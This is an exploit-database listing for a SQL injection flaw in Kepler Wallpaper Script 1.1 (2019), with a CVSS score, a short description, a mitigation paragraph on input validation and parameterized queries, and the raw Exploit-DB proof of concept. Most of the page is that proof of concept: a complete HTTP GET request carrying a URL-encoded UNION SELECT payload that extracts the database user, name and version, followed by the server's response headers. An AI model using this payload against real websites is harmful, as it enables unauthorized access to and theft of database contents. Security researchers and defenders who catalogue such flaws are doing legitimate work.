header-logo
Suggest Exploit
vendor:
Kepler Wallpaper Script
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Kepler Wallpaper Script
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:kepler_wallpaper_script:kepler_wallpaper_script:1.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2019

Kepler Wallpaper Script 1.1 – SQL Injection

Kepler Wallpaper Script 1.1 is vulnerable to SQL Injection. An attacker can send a malicious HTTP request containing a crafted SQL statement to the vulnerable application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be used to bypass authentication, access, modify and delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being passed to the SQL server. Additionally, parameterized queries should be used to prevent SQL injection.
Source

Exploit-DB raw data:

# Exploit Title: Kepler Wallpaper Script 1.1 - SQL Injection
# Dork: N/A
# Date: 2019-01-19
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://keplerwallpapers.online/
# Software Link: https://codeclerks.com/PHP/1559/Kepler-Wallpaper-Script
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]//[PATH]/category/xxx[SQL]
# 

GET /[PATH]/category/xxx%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=6963a7f072dbf72fb4cb420c9f5ad80a; ResolutionWidthAuto=1366; ResolutionHeightAuto=768; FilterType=Auto
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 19 Jan 2019 09:01:06 GMT
Server: Apache
X-Powered-By: PHP/5.6.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31536000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Navigation

Suggest Exploit

Services By CQR